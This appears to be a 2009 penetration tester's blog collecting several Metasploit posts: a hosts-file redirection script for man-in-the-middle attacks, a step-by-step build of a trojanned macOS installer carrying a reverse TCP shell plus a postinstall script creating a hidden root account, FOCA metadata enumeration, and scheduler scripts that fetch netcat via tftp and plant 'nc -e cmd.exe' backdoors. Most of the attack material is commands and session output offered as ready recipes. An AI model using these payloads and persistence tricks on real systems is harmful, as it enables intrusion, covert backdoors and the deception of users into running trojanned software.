Shell is only the Beginning

I recently commited to the Metasploit SVN the hostsedit.rb script, the main purpose of this script is for the adding of DNS name mappings in to the hosts file on a windows target host. The main purpose of this script is to redirect traffic destined for specific records to and IP address of the attacker choosing, very useful for performing Man In the Middle attacks or for redirecting traffic to managements or logging systems to localhost for covering ones track. To see the options available in the script you simply run it with out any option:

meterpreter > run hostsedit
This Meterpreter script is for adding entries in to the Windows Hosts file.
Since Windows will check first the Hosts file instead of the configured DNS Server
it will assist in diverting traffic to the fake entry or entries. Either a single
entry can be provided or a series of entries provided a file with one per line.
OPTIONS:
    -e <opt>  Host entry in the format of IP,Hostname.
    -h        Help Options.
    -l <opt>  Text file with list of entries in the format of IP,Hostname. One per line.
Example:
run hostsedit -e 127.0.0.1,google.com
run hostsedit -l /tmp/fakednsentries.txt

As it can be seen from the output above the 2 main option of this script is the addition of a single record where the IP and domain name are separated by a comma or the use of a file where each record to be added is one per line in the same format this permits the setting of hosts depending on the information gathered from the host or to be used in an automatic fashion where the script can be set in msfconsole to modify several clients as they connect to it. The script also has the capability in the case of Windows Vista target hosts to detect if UAC (User Access Control) is enabled since this will prevent any modification of the target hosts file.

Example of adding a single record and point google.com to another host in the network:

meterpreter > execute -H -c -f "cmd /c ping google.com" -i
Process 3544 created.
Channel 2 created.
Pinging google.com [74.125.127.100] with 32 bytes of data:
Reply from 74.125.127.100: bytes=32 time=238ms TTL=239
Reply from 74.125.127.100: bytes=32 time=224ms TTL=239
Reply from 74.125.127.100: bytes=32 time=256ms TTL=239
Reply from 74.125.127.100: bytes=32 time=278ms TTL=239
Ping statistics for 74.125.127.100:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 224ms, Maximum = 278ms, Average = 249ms
meterpreter > 
meterpreter > run hostsedit -e 192.168.1.120,google.com
[*] Making Backup of the hosts file.
[*] Backup loacated in C:\WINDOWS\System32\drivers\etc\hosts.back
[*] Adding Record for Host google.com with IP 192.168.1.120
[*] Clearing the DNS Cache
meterpreter > execute -H -c -f "cmd /c ping google.com" -i
Process 2888 created.
Channel 3 created.
Pinging google.com [192.168.1.120] with 32 bytes of data:
Reply from 192.168.1.120: bytes=32 time=1ms TTL=64
Reply from 192.168.1.120: bytes=32 time=2ms TTL=64
Reply from 192.168.1.120: bytes=32 time=1ms TTL=64
Reply from 192.168.1.120: bytes=32 time=2ms TTL=64
Ping statistics for 192.168.1.120:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 1ms, Maximum = 2ms, Average = 1ms
meterpreter >

msf exploit(handler) > cat /tmp/fakednsentries.txt
[*] exec: cat /tmp/fakednsentries.txt
127.0.0.1,symantec.com
127.0.0.1,microsoft.com
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > run hostsedit -l /tmp/fakednsentries.txt
[*] Making Backup of the hosts file.
[*] Backup loacated in C:\WINDOWS\System32\drivers\etc\hosts.back
[*] Adding Record for Host symantec.com with IP 127.0.0.1
[*] Adding Record for Host microsoft.com with IP 127.0.0.1
[*] Clearing the DNS Cache
meterpreter > execute -H -c -f "cmd /c ping symantec.com" -i
Process 3296 created.
Channel 8 created.
Pinging symantec.com [127.0.0.1] with 32 bytes of data:
Reply from 127.0.0.1: bytes=32 time=2ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Ping statistics for 127.0.0.1:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 2ms, Average = 0ms
meterpreter >

Windows Enumeration Script for Meterpreter from PaulDotCom on Vimeo.

Do checkout the tecnical segment at Pauldotcom.com and yes I'm now part of Pauldotcom.com :-)

Do subscribe to the podcast and checkout the Forums, I will be posting to the blog my test scripts that will later be added to the site. 

Mubix did a very good video on packaging a Meterpreter payload with iexpress in windows to create a trojanned installer for windows at room 362 I decided to give it a spin and make one for OSX, this kind of attack is perfect for many environments since there is no patch for stupidity. Packaging an evil installer gives many vector for performing attacks like placing it on Removable Media and seeing who picks it up, Social Engineering to name a few.

OSX has a packager named Package Maker that is included with OSX with their DVD their Development environment Xcode or it can be downloaded from http://connect.apple.com I highly recommend that the version used is the one downloaded from the webpage since this will be   the latest version for your Mac. Once the DMG file is downloaded and installed the tools will be located in the root of your hard drive under Development.

But before we create package we must create our payload for this example I will use a Metasploit Reverse TCP Shell for OSX and a script to create an account with UID 0 for later attack against the target machine. To generate our payload with the latest Metasploit development version we run the following command:

root@bt:/pentest/exploits/framework3# ./msfpayload osx/x86/shell_reverse_tcp LHOST=192.168.1.103 X > osxexe
Created by msfpayload (http://www.metasploit.com).
Payload: osx/x86/shell_reverse_tcp
 Length: 65
Options: LHOST=192.168.1.103

Now we have a OSX x86 Executable Payload set to connect back to attackers machine 192.168.1.103 on the default port of 4444. We will also create a post installation script to launch our payload and create an account with UID 0 this will give us Root privileges and will not show on the login screen since it is under UID 500. The script will look looks like this:

#!/bin/sh
#run Backdoor
/usr/bin/osxexe &
#create user account with admin privs
dscl . -create /Users/dark
dscl . -create /Users/dark UserShell /bin/bash
dscl . -create /Users/toddharris RealName "Darkoperator"
dscl . -create /Users/toddharris UniqueID 0
dscl . -create /Users/toddharris PrimaryGroupID 0
dscl . -passwd /Users/dark P@55w0rd
#

This script will launch the payload when it is installed on /usr/bin path on the target machine and it will create an account with username dark and password P@55w0rd . We now start the Package Maker which is located in the root of the System HD under Developmer/applications/utilities and we double click Package Maker. We should be greeted with a screen as follows:

We enter the organization name we want to appear in the properties of the file and the minimum target OS we want this package to run under.

Then we give the package a title and we select that the installation be on the System Volume and give it a description if we want.

We then on the bottom left side of the we click on the plus sing and select our payload if we wish we can also add a OSX app for cover, we set the Destination path for the payload and we make sure the Require Admin Authentication checkbox is selected since we want our script and payload to be executed as root.

On the content tab we select the payload and we set the proper permissions for the payload making the Owner root, Group admin and making sure that the file has the execute permission for the owner and others set.

In the scripts tab we select the Script Directory where we placed our post install script and we select it in postinstall the script.

Now we click on the top left the Build button to build our pkg file. We place the file in a DMG on a share, on a USB stick or any other place from where our target will execute the installer thinking it is a valid package.

We prepare our attacking machine to receive the shells that will be coming from the execution of the trojanned packaged in Metasploit and then we wait for the connections:

msf > use exploit/multi/handler 
msf exploit(handler) > set PAYLOAD osx/x86/shell_reverse_tcp 
PAYLOAD => osx/x86/shell_reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.103 
LHOST => 192.168.1.103
msf exploit(handler) > set ExitOnSeesion false
ExitOnSeesion => false
msf exploit(handler) > exploit
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Command shell session 1 opened (192.168.1.103:4444 -> 192.168.1.120:58942)
id
uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),8(procview),29(certusers),3(sys),9(procmod),4(tty),5(operator),80(admin),20(staff)
pwd
/
uname -a
Darwin carlos-perezs-computer.local 9.6.0 Darwin Kernel Version 9.6.0: Mon Nov 24 17:37:00 PST 2008; root:xnu-1228.9.59~1/RELEASE_I386 i386

As you can see the shell is running under id 0. This attack can be expanded on further with the addition of scheduling the payload to run every minute, configure and start SSH or Remote Connection (VNC) and disable the built in Firewall and little snitch if present among many other.

One very important part of any pentest is the gathering of information of the target network that will be attack and on area that is gaining a lot of traction is the enumeration thru metadata.  A tool I recently learned about by listening to the great podcast Exotic Liability where they mentioned the FOCA tool by Informatica64 when talking about their presentation at Blackhat Europe 09 you can either download the FOCA tool or you can use the webpage to summit your document for analysis. I do prefer to do most of my analysis locally since on almost all pentests I have conducted all information is confidential and the sharing of information with third parties is not permitted . This tool will analyze metadata from Microsoft Office Documents, PDF files, Open Office Files and Word Perfect files, EXIF Metadata out of images and the best part is that you can add the files you collected manually or found and downloaded thru web searches using Google and Live Search witch makes it extremely flexible for pentests. it will enumerate Users, Folders, Printers, Emails and the version of Software used to create the file. This tool will run on Windows XP and Windows Vista, I found it to be really unstable in Windows 7 Beta.

After downloading run the setup executable and the tool will be available in the start menu under programs. Once you execute the application you should see a screen line this one:

You can press Project –> New Project and start a new project where you give the Project Name, the Website to enumerate for documents and a give it a place to download and store the documents.

You can also instead choose to add a single file or folder of files that you have gathered previously via email, social engineering or any other way by Righ-Clicking with the mouse on the  document list area and choose either the Add File or Add Folder option.

When you select to create a New Project you the screen will change in the following manner giving you the option of which files to download and what search engine to use.

But what if the file type you are looking for is not in the options like PNG or JPG? you can click on the Custom Search link and enter the Google query your self or add filetype:<extension> like it is shown in the image below.

For the following screenshots I will enumerate and download only doc files from Blackhat.com, so I hit search and you can see the files that where found, one it has finish you can righ click and download only specific files of choose to download them all.  Once Downloaded you can righ-click again on them and choose to extract the metadata of a single file or select to extract the metadata of all the files.

Once it has finished extracting all the metadata you can look at it by clicking on the type or go to Documents select the document and click on it to get even more information not classified in the types given like EXIF data. Here I clicked on the folder tab and you can see I can identify usernames, location, servers and paths on the network of where this documents where created and stored, on some I have tested I was even able to enumerate Sharepoint Server structures.

This information can be exported in to a text file by right-clicking on the attribute and choosing to export data to a file, this can later be used to feed the data in to other tools or to gain information for further attacks like finding types of printers that can be used to store files or exploit since embedded device security tends to be low, or attack shares by dropping office documents with Meterpreter VBA shells or setting autirun.ini files to launch payloads or exploits on client PC’s, The options are many.

I will definitely be adding this tool to my toolbox and making it part of my methodology when executing target enumeration during pentetst. I hope you find this information useful and special thanks to the Exotic Liability team for mentioning this tool.

Recently I had a chance to look at Val Smith and Collin Ames presentation that was presented in Defcon 16 called Meta-Post Exploitation. In the presentation they talk about many post-exploitations techniques I already knew as well as some new approaches to others. 3 specific tools that where demoed that caught my attention where MassWinenum and AtAbuse. I quickly modified my Remotewinenum script to support multiple targets, quite an easy task since most of the work was already done, the only difference is that I use WMIC to achieve this, I like to be as stealthy as possible an use the built in tools as much I can to my advantage. Here is a sample of the execution of the script:

meterpreter > run remotewinenum -t 192.168.1.7,192.168.1.8
[*] Running Enumeration against 192.168.1.7
[*] Saving report to /home/carlos/.msf3/logs/remotewinenum/192.168.1.7_20090410.0206
[*] Running WMIC Commands ....
[*]     running command wimic environment list
[*]     running command wimic share list
[*]     running command wimic nicconfig list
[*]     running command wimic computersystem list
[*]     running command wimic useraccount list
[*]     running command wimic group list
[*]     running command wimic sysaccount list
[*]     running command wimic volume list brief
[*]     running command wimic logicaldisk get description,filesystem,name,size
[*]     running command wimic netlogin get name,lastlogon,badpasswordcount
[*]     running command wimic netclient list brief
[*]     running command wimic netuse get name,username,connectiontype,localname
[*]     running command wimic share get name,path
[*]     running command wimic nteventlog get path,filename,writeable
[*]     running command wimic service list brief
[*]     running command wimic process list brief
[*]     running command wimic startup list full
[*]     running command wimic rdtoggle list
[*]     running command wimic product get name,version
[*]     running command wimic qfe list
[*] Running Enumeration against 192.168.1.8
[*] Saving report to /home/carlos/.msf3/logs/remotewinenum/192.168.1.8_20090410.0206
[*] Running WMIC Commands ....
[*]     running command wimic environment list
[*]     running command wimic share list
[*]     running command wimic nicconfig list
[*]     running command wimic computersystem list
[*]     running command wimic useraccount list
[*]     running command wimic group list
[*]     running command wimic sysaccount list
[*]     running command wimic volume list brief
[*]     running command wimic logicaldisk get description,filesystem,name,size
[*]     running command wimic netlogin get name,lastlogon,badpasswordcount
[*]     running command wimic netclient list brief
[*]     running command wimic netuse get name,username,connectiontype,localname
[*]     running command wimic share get name,path
[*]     running command wimic nteventlog get path,filename,writeable
[*]     running command wimic service list brief
[*]     running command wimic process list brief
[*]     running command wimic startup list full
[*]     running command wimic rdtoggle list
[*]     running command wimic product get name,version
[*]     running command wimic qfe list
meterpreter > 

As it can be seen a comma separated target list can be provided now and the tool will execute either under the privileges under which Meterpreter is running or a username and password provided each report per host saved in a different file and location for later analysis.

The tool that draw most of my attention was the AtAbuser since it’s concept is extremely simple, for a long time I had been using the scheduler to schedule backdoors and for privilege escalation but Val Smith’s tools used it for remote command execution and since the privileges it runs under are as System this makes it a very powerful tool and as indicated the Scheduler service is one that is overlooked by many when hardening their servers. A set of tools came from this, the first one I call Scheduleme which it is for assisting in scheduling tasks on a local target or remote target.

meterpreter > run scheduleme 
Scheduleme Meterpreter Script
This script provides most common scheduling types used during a pentest.
It has the functionality to upload a desired executable or script and schedule
the file uploaded. All scheduled task are as System so Meterpreter process must
be System or local admin for local schedules and Administrator for remore shcedules
    -h         Help menu.
    -c <opt>   Command to execute at the given time. If options for execution needed use double quotes
    -d         Daily.
    -hr <opt>  Every specified hours 1-23.
    -m <opt>   Every specified amount of minutes 1-1439
    -l         When a user logs on.
    -s         At system startup.
    -i         Run command imediatly and only once.
    -r         Remote Schedule. Executable has to be already on remote target
    -e <opt>   Executable or script to upload to target host, will not work with remote schedule
    -o <opt>   Options for executable when upload method used
    -u         Username of account with administrative privelages.
    -p         Password for account provided.
    -t <opt>   Remote system to schedule job.
meterpreter > 

It also has the capability of uploading an executable and scheduling it on the target under which the Meterpreter session is running under. The options for scheduling are:

• Hourly
• Minutes
• At user logon
• At system startup
• Immediately

The script will run either as the privilege level under which Meterpreter is running or under the credentials provided, both for local and remote execution. I recently used this script in a pentest where I was able to gain access to a Windows 2008 server but do to the protection in Windows 2008 I could not dump the hashes even as Administrator so I scheduled a second Meterpreter payload to run immediately and since the schedules are done as system I was able to dump the hashes. The uploaded files are stored in the %TEMP% environment variable they receive a random name.

Setting a Netcat Backdoor first example will upload and set the backdoor, the second one is in the case the file already exists on the target machine:

meterpreter > run scheduleme -m 1 -u /tmp/nc.exe -o "-e cmd.exe -L -p 8080"
[*] Uploadingd /tmp/nc.exe....
[*] /tmp/nc.exe uploaded!
[*] Scheduling command C:\DOCUME~1\labuser\LOCALS~1\
Temp\svhost46.exe -e cmd.exe -L -p 8080 to run minute.....
[*] The scheduled task has been successfully created
[*] For cleanup run schtasks /delete /tn syscheck93 /F

meterpreter > run scheduleme -m 1 -c "C:\DOCUME~1\labuser\LOCALS~1\Temp\svhost46.exe -e cmd.exe -L -p 8088"
[*] Scheduling command C:DOCUME~1labuserLOCALS~1Tempsvhost46.exe -e cmd.exe -L -p 8088 to run minute.....
[*] The scheduled task has been successfully created
[*] For cleanup run schtasks /delete /tn syscheck47 /F

The other script that acts a bit more like the AtAbuser script that Val Smith demoed in his talk is the Schtaskabuse, it uses as the name implies the schtasks command instead of AT, one of the main reasons is flexibility and such flexibility makes it a more complex command to use in a shell but perfect for being scripted. The script will run a series command in a comma separated list and execute each of the command by scheduling the task, running the task immediately, waiting a specified time frame and then deleting the task. Just like the other scripts it will use the privileges of the process under which Meterpreter is running or credential can be provided. All commands will be executed under the context of system on the target box making this a very powerful tool under the right circumstances. 

meterpreter > run schtasksabuse 
Meterpreter session running as ACMEINC\Administrator
This Meterpreter script is for running commands on targets system using the
Windows Scheduler, it is based on the tool presented but not released by Val Smith
in Defcon 16 ATAbuser. If no user and password is given it will use the permissions
of the process Meterpreter is running under.
Options:

OPTIONS:

    -c <opt>  Commands to execute. Several command can be given but separated by commas and enclose the list in doble quotes if arguments are used.
    -d <opt>  Delay between the execution of commands in seconds, default is 2 seconds if not given.
    -h        Help menu.
    -p <opt>  Password for user account specified, it must be given if a user is given.
    -t <opt>  Remote system to schedule job.
    -u <opt>  Username to schedule task, if none is given the current user credentials will be used.

An example of a run of the file to download via tftp of Netcat and then running it as a backdoor.

meterpreter > run schtasksabuse-dev -t 192.168.1.7 -c "tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe" -d 4
Meterpreter session running as ACMEINC\Administrator
[*] Scheduling command tftp -i 192.168.1.8 GET nc.exe to run .....
[*] The scheduled task has been successfully created
[*] Running command on 192.168.1.7
[*] Removing scheduled task
[*] Scheduling command nc -L -p 8080 -e cmd.exe to run .....
[*] The scheduled task has been successfully created
[*] Running command on 192.168.1.7
[*] Removing scheduled task
meterpreter > 

This can be used to start services, upload payloads, fgdump or any other set of tools or command and execute them.

I hope that this tools are helpful and all feedback is welcomed. I will summit this tools to the Metasploit project for approval for commitment in to the current development branch

Update on Saturday, April 11, 2009 at 10:05AM by Carlos Perez

A firend of mine with whom I shared the initial versions of the scripts has used them in a recent pentests and had a couple of feature quest with I have added.

remotewinenum

• Accepts a list of targets from a file with one target address per linewith the -l switch.

schtaskabuse

• Accepts a list of targets from a file with one target address per line with the -l switch.
• Accepts a list of command from a file with one command per line with the -s switch.

One important note in the test of others and mine is that when scheduling commands a best practice is to use cmd /c at the begining of the commands since for some it will fail to provide the required results even do they are executed.